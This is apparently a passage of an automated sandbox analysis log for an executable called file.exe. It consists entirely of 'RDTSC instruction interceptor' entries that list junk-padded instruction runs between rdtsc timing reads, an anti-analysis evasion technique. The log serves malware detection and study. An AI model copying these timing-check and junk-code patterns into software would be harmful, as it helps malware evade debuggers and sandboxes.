            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B04D second address: 26B053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B1A0 second address: 26B1A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B1A8 second address: 26B1C7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c jmp 00007FE9F881B0C3h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B331 second address: 26B335 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B4A3 second address: 26B4A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B4A7 second address: 26B4C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007FE9F8B69B9Eh 0x0000000e jng 00007FE9F8B69B98h 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B4C5 second address: 26B4D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE9F881B0B6h 0x0000000a jp 00007FE9F881B0B6h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B4D5 second address: 26B4D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B4D9 second address: 26B4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B631 second address: 26B63D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FE9F8B69B96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B63D second address: 26B64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26E7CA second address: 26E7CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26E7CE second address: 26E806 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F881B0C9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9F881B0C5h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26E806 second address: 26E811 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26E811 second address: 26E817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2736CD second address: 2736D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2736D1 second address: 2736DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277B57 second address: 277B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FE9F8B69B9Eh 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277CE6 second address: 277CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 278192 second address: 278198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 278198 second address: 27819C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2782ED second address: 278324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE9F8B69B96h 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 push ebx 0x00000012 jmp 00007FE9F8B69BA4h 0x00000017 jo 00007FE9F8B69B96h 0x0000001d pop ebx 0x0000001e popad 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 js 00007FE9F8B69B96h 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2785E4 second address: 2785FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2785FD second address: 278603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 278758 second address: 27876C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FE9F881B0BAh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2788CA second address: 2788E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69B9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FE9F8B69B96h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2788E5 second address: 278918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FE9F881B0C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE9F881B0C5h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 278918 second address: 278929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69B9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F5096 second address: 1F50A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007FE9F881B0B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B702 second address: 27B71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FE9F8B69BA4h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B71F second address: 27B723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27B991 second address: 27B9B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE9F8B69B9Ch 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E1DB second address: 27E1EB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FE9F881B0B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27DEB5 second address: 27DED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE9F8B69BA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281E73 second address: 281E77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281E77 second address: 281E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281E81 second address: 281E96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28177A second address: 281782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281782 second address: 28178A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281906 second address: 28190C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28190C second address: 281913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281913 second address: 281918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 281918 second address: 281922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286E87 second address: 286E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 286E8F second address: 286E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2872DA second address: 2872FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FE9F8B69BA1h 0x0000000d jnl 00007FE9F8B69B96h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2872FB second address: 287328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FE9F881B0C4h 0x0000000f pop ecx 0x00000010 jmp 00007FE9F881B0BBh 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 287328 second address: 28732E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2875F9 second address: 28761F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE9F881B0BCh 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28761F second address: 287623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 287623 second address: 287636 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 287636 second address: 28763C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28763C second address: 287643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 287643 second address: 28764D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE9F8B69BA2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28764D second address: 287653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 287653 second address: 28765B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28765B second address: 287661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 287661 second address: 287665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2314A1 second address: 2314A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2314A5 second address: 2314AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2314AB second address: 2314B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2314B1 second address: 2314B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2877F8 second address: 2877FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28C770 second address: 28C774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28BA39 second address: 28BA49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0BAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28BB9F second address: 28BBA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28BBA7 second address: 28BBBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FE9F881B0BAh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28BBBD second address: 28BBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28BE4A second address: 28BE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop esi 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a ja 00007FE9F881B0B6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FE9F881B0BEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28C02B second address: 28C066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F8B69BA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FE9F8B69B9Ah 0x0000000e pushad 0x0000000f jmp 00007FE9F8B69BA2h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28C1F4 second address: 28C1FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293E98 second address: 293EB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE9F8B69B9Dh 0x00000009 jmp 00007FE9F8B69B9Ch 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293EB5 second address: 293EC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293EC0 second address: 293EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2921BD second address: 2921D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F881B0C6h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2924BC second address: 2924D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FE9F8B69BA3h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2924D7 second address: 2924F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE9F881B0C7h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 292ABB second address: 292AC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FE9F8B69B96h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 292D5E second address: 292D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 292D69 second address: 292D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293050 second address: 293062 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jbe 00007FE9F881B0B6h 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293327 second address: 293340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push esi 0x00000008 jp 00007FE9F8B69B96h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 jp 00007FE9F8B69BA2h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293340 second address: 293346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293346 second address: 293350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2935E9 second address: 2935F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2935F0 second address: 293606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FE9F8B69B9Ah 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FE9F8B69B96h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293B81 second address: 293B8B instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE9F881B0B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293B8B second address: 293BA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE9F8B69B9Ch 0x0000000b push esi 0x0000000c push ebx 0x0000000d jnc 00007FE9F8B69B96h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29D316 second address: 29D341 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE9F881B0C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE9F881B0C5h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29C5DC second address: 29C5EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jc 00007FE9F8B69B9Eh 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29C5EF second address: 29C5F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29C5F5 second address: 29C5F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29C78B second address: 29C799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jg 00007FE9F881B0B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29CBA2 second address: 29CBB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FE9F8B69B96h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29CD57 second address: 29CD5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29CD5D second address: 29CD9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FE9F8B69BA4h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FE9F8B69BA7h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push esi 0x0000001c pop esi 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A40D1 second address: 2A40DB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE9F881B0B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4231 second address: 2A4235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4235 second address: 2A4239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
